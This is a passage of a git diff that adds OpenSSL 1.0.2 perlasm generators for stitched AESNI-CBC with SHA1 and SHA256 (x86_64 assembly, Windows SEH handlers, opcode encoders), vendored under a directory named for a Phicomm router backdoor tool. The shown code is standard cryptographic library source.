+	mov	$B,@T[0]		# magic seed
+	mov	16($ctx),$E
+	mov	$C,@T[1]
+	xor	$D,@T[1]
+	and	@T[1],@T[0]
+
+	vmovdqa	64($K_XX_XX),@X[2]	# pbswap mask
+	vmovdqa	0($K_XX_XX),$Kx		# K_00_19
+	vmovdqu	0($inp),@X[-4&7]	# load input to %xmm[0-3]
+	vmovdqu	16($inp),@X[-3&7]
+	vmovdqu	32($inp),@X[-2&7]
+	vmovdqu	48($inp),@X[-1&7]
+	vpshufb	@X[2],@X[-4&7],@X[-4&7]	# byte swap
+	add	\$64,$inp
+	vpshufb	@X[2],@X[-3&7],@X[-3&7]
+	vpshufb	@X[2],@X[-2&7],@X[-2&7]
+	vpshufb	@X[2],@X[-1&7],@X[-1&7]
+	vpaddd	$Kx,@X[-4&7],@X[0]	# add K_00_19
+	vpaddd	$Kx,@X[-3&7],@X[1]
+	vpaddd	$Kx,@X[-2&7],@X[2]
+	vmovdqa	@X[0],0(%rsp)		# X[]+K xfer to IALU
+	vmovdqa	@X[1],16(%rsp)
+	vmovdqa	@X[2],32(%rsp)
+	vmovups	-112($key),$rndkey0	# $key[0]
+	jmp	.Loop_dec_avx
+
+.align	32
+.Loop_dec_avx:
+___
+	&Xupdate_avx_16_31(\&body_00_19_dec);
+	&Xupdate_avx_16_31(\&body_00_19_dec);
+	&Xupdate_avx_16_31(\&body_00_19_dec);
+	&Xupdate_avx_16_31(\&body_00_19_dec);
+	&Xupdate_avx_32_79(\&body_00_19_dec);
+	&Xupdate_avx_32_79(\&body_20_39_dec);
+	&Xupdate_avx_32_79(\&body_20_39_dec);
+	&Xupdate_avx_32_79(\&body_20_39_dec);
+	&Xupdate_avx_32_79(\&body_20_39_dec);
+	&Xupdate_avx_32_79(\&body_20_39_dec);
+	&Xupdate_avx_32_79(\&body_40_59_dec);
+	&Xupdate_avx_32_79(\&body_40_59_dec);
+	&Xupdate_avx_32_79(\&body_40_59_dec);
+	&Xupdate_avx_32_79(\&body_40_59_dec);
+	&Xupdate_avx_32_79(\&body_40_59_dec);
+	&Xupdate_avx_32_79(\&body_20_39_dec);
+	&Xuplast_avx_80(\&body_20_39_dec,".Ldone_dec_avx");	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+				$saved_rx=$rx;
+
+	&Xloop_avx(\&body_20_39_dec);
+	&Xloop_avx(\&body_20_39_dec);
+	&Xloop_avx(\&body_20_39_dec);
+
+	eval(@aes256_dec[-1]);			# last store
+$code.=<<___;
+	lea	64($in0),$in0
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	add	12($ctx),$D
+	mov	$A,0($ctx)
+	add	16($ctx),$E
+	mov	@T[0],4($ctx)
+	mov	@T[0],$B			# magic seed
+	mov	$C,8($ctx)
+	mov	$C,@T[1]
+	mov	$D,12($ctx)
+	xor	$D,@T[1]
+	mov	$E,16($ctx)
+	and	@T[1],@T[0]
+	jmp	.Loop_dec_avx
+
+.Ldone_dec_avx:
+___
+				$jj=$j=$saved_j; @V=@saved_V;
+				$rx=$saved_rx;
+
+	&Xtail_avx(\&body_20_39_dec);
+	&Xtail_avx(\&body_20_39_dec);
+	&Xtail_avx(\&body_20_39_dec);
+
+	eval(@aes256_dec[-1]);			# last store
+$code.=<<___;
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	mov	$A,0($ctx)
+	add	12($ctx),$D
+	mov	@T[0],4($ctx)
+	add	16($ctx),$E
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+	vmovups	@X[3],($ivp)			# write IV
+	vzeroall
+___
+$code.=<<___ if ($win64);
+	movaps	96+0(%rsp),%xmm6
+	movaps	96+16(%rsp),%xmm7
+	movaps	96+32(%rsp),%xmm8
+	movaps	96+48(%rsp),%xmm9
+	movaps	96+64(%rsp),%xmm10
+	movaps	96+80(%rsp),%xmm11
+	movaps	96+96(%rsp),%xmm12
+	movaps	96+112(%rsp),%xmm13
+	movaps	96+128(%rsp),%xmm14
+	movaps	96+144(%rsp),%xmm15
+___
+$code.=<<___;
+	lea	`104+($win64?10*16:0)`(%rsp),%rsi
+	mov	0(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_dec_avx:
+	ret
+.size	aesni256_cbc_sha1_dec_avx,.-aesni256_cbc_sha1_dec_avx
+___
+						}}}
+}
+$code.=<<___;
+.align	64
+K_XX_XX:
+.long	0x5a827999,0x5a827999,0x5a827999,0x5a827999	# K_00_19
+.long	0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1	# K_20_39
+.long	0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc	# K_40_59
+.long	0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6	# K_60_79
+.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap mask
+.byte	0xf,0xe,0xd,0xc,0xb,0xa,0x9,0x8,0x7,0x6,0x5,0x4,0x3,0x2,0x1,0x0
+
+.asciz	"AESNI-CBC+SHA1 stitch for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+						if ($shaext) {{{
+($in0,$out,$len,$key,$ivp,$ctx,$inp)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+
+$rounds="%r11d";
+
+($iv,$in,$rndkey0)=map("%xmm$_",(2,14,15));
+@rndkey=("%xmm0","%xmm1");
+$r=0;
+
+my ($BSWAP,$ABCD,$E,$E_,$ABCD_SAVE,$E_SAVE)=map("%xmm$_",(7..12));
+my @MSG=map("%xmm$_",(3..6));
+
+$code.=<<___;
+.type	aesni_cbc_sha1_enc_shaext,\@function,6
+.align	32
+aesni_cbc_sha1_enc_shaext:
+	mov	`($win64?56:8)`(%rsp),$inp	# load 7th argument
+___
+$code.=<<___ if ($win64);
+	lea	`-8-10*16`(%rsp),%rsp
+	movaps	%xmm6,-8-10*16(%rax)
+	movaps	%xmm7,-8-9*16(%rax)
+	movaps	%xmm8,-8-8*16(%rax)
+	movaps	%xmm9,-8-7*16(%rax)
+	movaps	%xmm10,-8-6*16(%rax)
+	movaps	%xmm11,-8-5*16(%rax)
+	movaps	%xmm12,-8-4*16(%rax)
+	movaps	%xmm13,-8-3*16(%rax)
+	movaps	%xmm14,-8-2*16(%rax)
+	movaps	%xmm15,-8-1*16(%rax)
+.Lprologue_shaext:
+___
+$code.=<<___;
+	movdqu	($ctx),$ABCD
+	movd	16($ctx),$E
+	movdqa	K_XX_XX+0x50(%rip),$BSWAP	# byte-n-word swap
+
+	mov	240($key),$rounds
+	sub	$in0,$out
+	movups	($key),$rndkey0			# $key[0]
+	movups	16($key),$rndkey[0]		# forward reference
+	lea	112($key),$key			# size optimization
+
+	pshufd	\$0b00011011,$ABCD,$ABCD	# flip word order
+	pshufd	\$0b00011011,$E,$E		# flip word order
+	jmp	.Loop_shaext
+
+.align	16
+.Loop_shaext:
+___
+	&$aesenc();
+$code.=<<___;
+	movdqu		($inp),@MSG[0]
+	movdqa		$E,$E_SAVE		# offload $E
+	pshufb		$BSWAP,@MSG[0]
+	movdqu		0x10($inp),@MSG[1]
+	movdqa		$ABCD,$ABCD_SAVE	# offload $ABCD
+___
+	&$aesenc();
+$code.=<<___;
+	pshufb		$BSWAP,@MSG[1]
+
+	paddd		@MSG[0],$E
+	movdqu		0x20($inp),@MSG[2]
+	lea		0x40($inp),$inp
+	pxor		$E_SAVE,@MSG[0]		# black magic
+___
+	&$aesenc();
+$code.=<<___;
+	pxor		$E_SAVE,@MSG[0]		# black magic
+	movdqa		$ABCD,$E_
+	pshufb		$BSWAP,@MSG[2]
+	sha1rnds4	\$0,$E,$ABCD		# 0-3
+	sha1nexte	@MSG[1],$E_
+___
+	&$aesenc();
+$code.=<<___;
+	sha1msg1	@MSG[1],@MSG[0]
+	movdqu		-0x10($inp),@MSG[3]
+	movdqa		$ABCD,$E
+	pshufb		$BSWAP,@MSG[3]
+___
+	&$aesenc();
+$code.=<<___;
+	sha1rnds4	\$0,$E_,$ABCD		# 4-7
+	sha1nexte	@MSG[2],$E
+	pxor		@MSG[2],@MSG[0]
+	sha1msg1	@MSG[2],@MSG[1]
+___
+	&$aesenc();
+
+for($i=2;$i<20-4;$i++) {
+$code.=<<___;
+	movdqa		$ABCD,$E_
+	sha1rnds4	\$`int($i/5)`,$E,$ABCD	# 8-11
+	sha1nexte	@MSG[3],$E_
+___
+	&$aesenc();
+$code.=<<___;
+	sha1msg2	@MSG[3],@MSG[0]
+	pxor		@MSG[3],@MSG[1]
+	sha1msg1	@MSG[3],@MSG[2]
+___
+	($E,$E_)=($E_,$E);
+	push(@MSG,shift(@MSG));
+
+	&$aesenc();
+}
+$code.=<<___;
+	movdqa		$ABCD,$E_
+	sha1rnds4	\$3,$E,$ABCD		# 64-67
+	sha1nexte	@MSG[3],$E_
+	sha1msg2	@MSG[3],@MSG[0]
+	pxor		@MSG[3],@MSG[1]
+___
+	&$aesenc();
+$code.=<<___;
+	movdqa		$ABCD,$E
+	sha1rnds4	\$3,$E_,$ABCD		# 68-71
+	sha1nexte	@MSG[0],$E
+	sha1msg2	@MSG[0],@MSG[1]
+___
+	&$aesenc();
+$code.=<<___;
+	movdqa		$E_SAVE,@MSG[0]
+	movdqa		$ABCD,$E_
+	sha1rnds4	\$3,$E,$ABCD		# 72-75
+	sha1nexte	@MSG[1],$E_
+___
+	&$aesenc();
+$code.=<<___;
+	movdqa		$ABCD,$E
+	sha1rnds4	\$3,$E_,$ABCD		# 76-79
+	sha1nexte	$MSG[0],$E
+___
+	while($r<40)	{ &$aesenc(); }		# remaining aesenc's
+$code.=<<___;
+	dec		$len
+
+	paddd		$ABCD_SAVE,$ABCD
+	movups		$iv,48($out,$in0)	# write output
+	lea		64($in0),$in0
+	jnz		.Loop_shaext
+
+	pshufd	\$0b00011011,$ABCD,$ABCD
+	pshufd	\$0b00011011,$E,$E
+	movups	$iv,($ivp)			# write IV
+	movdqu	$ABCD,($ctx)
+	movd	$E,16($ctx)
+___
+$code.=<<___ if ($win64);
+	movaps	-8-10*16(%rax),%xmm6
+	movaps	-8-9*16(%rax),%xmm7
+	movaps	-8-8*16(%rax),%xmm8
+	movaps	-8-7*16(%rax),%xmm9
+	movaps	-8-6*16(%rax),%xmm10
+	movaps	-8-5*16(%rax),%xmm11
+	movaps	-8-4*16(%rax),%xmm12
+	movaps	-8-3*16(%rax),%xmm13
+	movaps	-8-2*16(%rax),%xmm14
+	movaps	-8-1*16(%rax),%xmm15
+	mov	%rax,%rsp
+.Lepilogue_shaext:
+___
+$code.=<<___;
+	ret
+.size	aesni_cbc_sha1_enc_shaext,.-aesni_cbc_sha1_enc_shaext
+___
+						}}}
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	ssse3_handler,\@abi-omnipotent
+.align	16
+ssse3_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+___
+$code.=<<___ if ($shaext);
+	lea	aesni_cbc_sha1_enc_shaext(%rip),%r10
+	cmp	%r10,%rbx
+	jb	.Lseh_no_shaext
+
+	lea	(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+	lea	168(%rax),%rax		# adjust stack pointer
+	jmp	.Lcommon_seh_tail
+.Lseh_no_shaext:
+___
+$code.=<<___;
+	lea	96(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+	lea	`104+10*16`(%rax),%rax	# adjust stack pointer
+
+	mov	0(%rax),%r15
+	mov	8(%rax),%r14
+	mov	16(%rax),%r13
+	mov	24(%rax),%r12
+	mov	32(%rax),%rbp
+	mov	40(%rax),%rbx
+	lea	48(%rax),%rax
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	ssse3_handler,.-ssse3_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_aesni_cbc_sha1_enc_ssse3
+	.rva	.LSEH_end_aesni_cbc_sha1_enc_ssse3
+	.rva	.LSEH_info_aesni_cbc_sha1_enc_ssse3
+___
+$code.=<<___ if ($avx);
+	.rva	.LSEH_begin_aesni_cbc_sha1_enc_avx
+	.rva	.LSEH_end_aesni_cbc_sha1_enc_avx
+	.rva	.LSEH_info_aesni_cbc_sha1_enc_avx
+___
+$code.=<<___ if ($shaext);
+	.rva	.LSEH_begin_aesni_cbc_sha1_enc_shaext
+	.rva	.LSEH_end_aesni_cbc_sha1_enc_shaext
+	.rva	.LSEH_info_aesni_cbc_sha1_enc_shaext
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_aesni_cbc_sha1_enc_ssse3:
+	.byte	9,0,0,0
+	.rva	ssse3_handler
+	.rva	.Lprologue_ssse3,.Lepilogue_ssse3	# HandlerData[]
+___
+$code.=<<___ if ($avx);
+.LSEH_info_aesni_cbc_sha1_enc_avx:
+	.byte	9,0,0,0
+	.rva	ssse3_handler
+	.rva	.Lprologue_avx,.Lepilogue_avx		# HandlerData[]
+___
+$code.=<<___ if ($shaext);
+.LSEH_info_aesni_cbc_sha1_enc_shaext:
+	.byte	9,0,0,0
+	.rva	ssse3_handler
+	.rva	.Lprologue_shaext,.Lepilogue_shaext	# HandlerData[]
+___
+}
+
+####################################################################
+sub rex {
+  local *opcode=shift;
+  my ($dst,$src)=@_;
+  my $rex=0;
+
+    $rex|=0x04			if($dst>=8);
+    $rex|=0x01			if($src>=8);
+    unshift @opcode,$rex|0x40	if($rex);
+}
+
+sub sha1rnds4 {
+    if (@_[0] =~ /\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x3a,0xcc);
+	rex(\@opcode,$3,$2);
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	my $c=$1;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return "sha1rnds4\t".@_[0];
+    }
+}
+
+sub sha1op38 {
+    my $instr = shift;
+    my %opcodelet = (
+		"sha1nexte" => 0xc8,
+  		"sha1msg1"  => 0xc9,
+		"sha1msg2"  => 0xca	);
+
+    if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x38);
+	rex(\@opcode,$2,$1);
+	push @opcode,$opcodelet{$instr};
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return $instr."\t".@_[0];
+    }
+}
+
+sub aesni {
+  my $line=shift;
+  my @opcode=(0x0f,0x38);
+
+    if ($line=~/(aes[a-z]+)\s+%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+	my %opcodelet = (
+		"aesenc" => 0xdc,	"aesenclast" => 0xdd,
+		"aesdec" => 0xde,	"aesdeclast" => 0xdf
+	);
+	return undef if (!defined($opcodelet{$1}));
+	rex(\@opcode,$3,$2);
+	push @opcode,$opcodelet{$1},0xc0|($2&7)|(($3&7)<<3);	# ModR/M
+	unshift @opcode,0x66;
+	return ".byte\t".join(',',@opcode);
+    }
+    return $line;
+}
+
+foreach (split("\n",$code)) {
+        s/\`([^\`]*)\`/eval $1/geo;
+
+	s/\b(sha1rnds4)\s+(.*)/sha1rnds4($2)/geo		or
+	s/\b(sha1[^\s]*)\s+(.*)/sha1op38($1,$2)/geo		or
+	s/\b(aes.*%xmm[0-9]+).*$/aesni($1)/geo;
+
+	print $_,"\n";
+}
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha256-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha256-x86_64.pl
new file mode 100644
index 0000000..c1fce89
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha256-x86_64.pl
@@ -0,0 +1,1708 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# January 2013
+#
+# This is AESNI-CBC+SHA256 stitch implementation. The idea, as spelled
+# in http://download.intel.com/design/intarch/papers/323686.pdf, is
+# that since AESNI-CBC encrypt exhibit *very* low instruction-level
+# parallelism, interleaving it with another algorithm would allow to
+# utilize processor resources better and achieve better performance.
+# SHA256 instruction sequences(*) are taken from sha512-x86_64.pl and
+# AESNI code is weaved into it. As SHA256 dominates execution time,
+# stitch performance does not depend on AES key length. Below are
+# performance numbers in cycles per processed byte, less is better,
+# for standalone AESNI-CBC encrypt, standalone SHA256, and stitched
+# subroutine:
+#
+#		 AES-128/-192/-256+SHA256	this(**)gain
+# Sandy Bridge	    5.05/6.05/7.05+11.6		13.0	+28%/36%/43%
+# Ivy Bridge	    5.05/6.05/7.05+10.3		11.6	+32%/41%/50%
+# Haswell	    4.43/5.29/6.19+7.80		8.79	+39%/49%/59%
+# Bulldozer	    5.77/6.89/8.00+13.7		13.7	+42%/50%/58%
+#
+# (*)	there are XOP, AVX1 and AVX2 code pathes, meaning that
+#	Westmere is omitted from loop, this is because gain was not
+#	estimated high enough to justify the effort;
+# (**)	these are EVP-free results, results obtained with 'speed
+#	-evp aes-256-cbc-hmac-sha256' will vary by percent or two;
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=12);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+$shaext=$avx;	### set to zero if compiling for 1.0.1
+$avx=1		if (!$shaext && $avx);
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$func="aesni_cbc_sha256_enc";
+$TABLE="K256";
+$SZ=4;
+@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%eax","%ebx","%ecx","%edx",
+				"%r8d","%r9d","%r10d","%r11d");
+($T1,$a0,$a1,$a2,$a3)=("%r12d","%r13d","%r14d","%r15d","%esi");
+@Sigma0=( 2,13,22);
+@Sigma1=( 6,11,25);
+@sigma0=( 7,18, 3);
+@sigma1=(17,19,10);
+$rounds=64;
+
+########################################################################
+# void aesni_cbc_sha256_enc(const void *inp,
+#			void *out,
+#			size_t length,
+#			const AES_KEY *key,
+#			unsigned char *iv,
+#			SHA256_CTX *ctx,
+#			const void *in0);
+($inp,  $out,  $len,  $key,  $ivp, $ctx, $in0) =
+("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+
+$Tbl="%rbp";
+
+$_inp="16*$SZ+0*8(%rsp)";
+$_out="16*$SZ+1*8(%rsp)";
+$_end="16*$SZ+2*8(%rsp)";
+$_key="16*$SZ+3*8(%rsp)";
+$_ivp="16*$SZ+4*8(%rsp)";
+$_ctx="16*$SZ+5*8(%rsp)";
+$_in0="16*$SZ+6*8(%rsp)";
+$_rsp="16*$SZ+7*8(%rsp)";
+$framesz=16*$SZ+8*8;
+
+$code=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+.globl	$func
+.type	$func,\@abi-omnipotent
+.align	16
+$func:
+___
+						if ($avx) {
+$code.=<<___;
+	lea	OPENSSL_ia32cap_P(%rip),%r11
+	mov	\$1,%eax
+	cmp	\$0,`$win64?"%rcx":"%rdi"`
+	je	.Lprobe
+	mov	0(%r11),%eax
+	mov	4(%r11),%r10
+___
+$code.=<<___ if ($shaext);
+	bt	\$61,%r10			# check for SHA
+	jc	${func}_shaext
+___
+$code.=<<___;
+	mov	%r10,%r11
+	shr	\$32,%r11
+
+	test	\$`1<<11`,%r10d			# check for XOP
+	jnz	${func}_xop
+___
+$code.=<<___ if ($avx>1);
+	and	\$`1<<8|1<<5|1<<3`,%r11d	# check for BMI2+AVX2+BMI1
+	cmp	\$`1<<8|1<<5|1<<3`,%r11d
+	je	${func}_avx2
+___
+$code.=<<___;
+	and	\$`1<<30`,%eax			# mask "Intel CPU" bit
+	and	\$`1<<28|1<<9`,%r10d		# mask AVX+SSSE3 bits
+	or	%eax,%r10d
+	cmp	\$`1<<28|1<<9|1<<30`,%r10d
+	je	${func}_avx
+	ud2
+___
+						}
+$code.=<<___;
+	xor	%eax,%eax
+	cmp	\$0,`$win64?"%rcx":"%rdi"`
+	je	.Lprobe
+	ud2
+.Lprobe:
+	ret
+.size	$func,.-$func
+
+.align	64
+.type	$TABLE,\@object
+$TABLE:
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
+	.long	0,0,0,0,   0,0,0,0,   -1,-1,-1,-1
+	.long	0,0,0,0,   0,0,0,0
+	.asciz	"AESNI-CBC+SHA256 stitch for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+
+######################################################################
+# SIMD code paths
+#
+{{{
+($iv,$inout,$roundkey,$temp,
+ $mask10,$mask12,$mask14,$offload)=map("%xmm$_",(8..15));
+
+$aesni_cbc_idx=0;
+@aesni_cbc_block = (
+##	&vmovdqu	($roundkey,"0x00-0x80($inp)");'
+##	&vmovdqu	($inout,($inp));
+##	&mov		($_inp,$inp);
+
+	'&vpxor		($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x10-0x80($inp)");',
+
+	'&vpxor		($inout,$inout,$iv);',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x20-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x30-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x40-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x50-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x60-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x70-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x80-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x90-0x80($inp)");',
+
+	'&vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0xa0-0x80($inp)");',
+
+	'&vaesenclast	($temp,$inout,$roundkey);'.
+	' &vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0xb0-0x80($inp)");',
+
+	'&vpand		($iv,$temp,$mask10);'.
+	' &vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0xc0-0x80($inp)");',
+
+	'&vaesenclast	($temp,$inout,$roundkey);'.
+	' &vaesenc	($inout,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0xd0-0x80($inp)");',
+
+	'&vpand		($temp,$temp,$mask12);'.
